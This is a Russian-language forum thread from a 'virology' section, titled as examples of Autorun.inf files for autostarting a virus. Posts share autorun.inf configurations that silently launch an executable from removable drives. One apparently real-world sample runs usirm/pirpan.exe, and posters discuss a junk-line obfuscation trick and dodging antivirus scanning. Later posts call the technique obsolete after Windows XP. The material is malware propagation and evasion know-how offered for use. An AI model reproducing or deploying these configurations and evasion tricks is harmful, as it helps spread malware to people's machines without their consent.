Суббота, 21.12.2024, 19:40 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx  
delphicode » Delphi » Вирусология Delphi » Примеры Autorun.inf файлов (Для автозапуска вируса)
Примеры Autorun.inf файлов
dolphinДата: Четверг, 23.07.2009, 16:46 | Сообщение # 1
Администратор
Сообщений: 906
Статус: Offline
[Autorun]
shell\autorun\command=autorun.exe
shell\autorun=Открыть

[Autorun] - обявление автозапуска

icon=%SystemRoot%\system32\SHELL32.dll,4 - системная иконка (цифры от 1 до 40 по моему)

 
AD0Дата: Пятница, 24.07.2009, 12:28 | Сообщение # 2
Группа: Удаленные



неплохо..тока все авиры аутораны флэх проверяют=( есл тока проги не использовать а библиотеки при том закриптованные ...
 
dolphinДата: Понедельник, 16.11.2009, 21:24 | Сообщение # 3
Администратор
Сообщений: 906
Статус: Offline
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
dolphinДата: Четверг, 26.11.2009, 23:05 | Сообщение # 4
Администратор
Сообщений: 906
Статус: Offline
[AutoRun]
open=111111111111111111111111111111
shell\open\Command=11111111111111111111111111111111111
shell\open\Default=1
shell\explore\Command=1 111111111111111111111111111111111
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
boombazaДата: Среда, 24.02.2010, 19:53 | Сообщение # 5
Был не раз
Зарегистрирован: 22.02.2010
Группа: Пользователи
Сообщений: 6
Статус: Offline
 
boombazaДата: Среда, 24.02.2010, 19:54 | Сообщение # 6
Был не раз
Зарегистрирован: 22.02.2010
Группа: Пользователи
Сообщений: 6
Статус: Offline
строка с shellexecute целенаправленно изменена
 
boombazaДата: Среда, 24.02.2010, 19:57 | Сообщение # 7
Был не раз
Зарегистрирован: 22.02.2010
Группа: Пользователи
Сообщений: 6
Статус: Offline
И ещё файл autorun.inf (в моём примере) сам является программой
 
dolphinДата: Вторник, 26.08.2014, 15:02 | Сообщение # 8
Администратор
Сообщений: 906
Статус: Offline
С работы

[autorun]
USEAUTOPLAY=1
shellexecute=usirm/pirpan.exe
Shellfdjklfwklfw
shell\\Explore\\command=usirm/pirpan.exe
shell\Open\\command=usirm/pirpan.exe
icon=usirm/pirpan.exe
open=usirm//pirpan.exe
action=0pen folder to view files using Windows Explorer
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
Anton93Дата: Вторник, 26.08.2014, 21:39 | Сообщение # 9
Продвинутый
Зарегистрирован: 06.01.2010
Группа: Модераторы
Сообщений: 320
Статус: Offline
dolphin, довольно таки старый вариант авторана, в 2010 видел такой.
бессмысленная строчка - Shellfdjklfwklfw - является своего рода обфускацией того времени. структура инф файла не портилась, и он оставался 100% работоспособным, однако эвристика его по началу воспринимала плохо, помню на машине был касперский, обновленный по последнее число, который пропускал его, сейчас насколько я знаю, автораны на съемных носителях сразу пресекаются, вне зависимости от содержимого
ICQ: 41896
 
dolphinДата: Четверг, 28.08.2014, 11:40 | Сообщение # 10
Администратор
Сообщений: 906
Статус: Offline
Anton93, да, на современных системах (вышедших после ХР) не актуально, в данном случае можно просто воспринимать как раритет.
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
delphicode » Delphi » Вирусология Delphi » Примеры Autorun.inf файлов (Для автозапуска вируса)
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2024 Хостинг от uCoz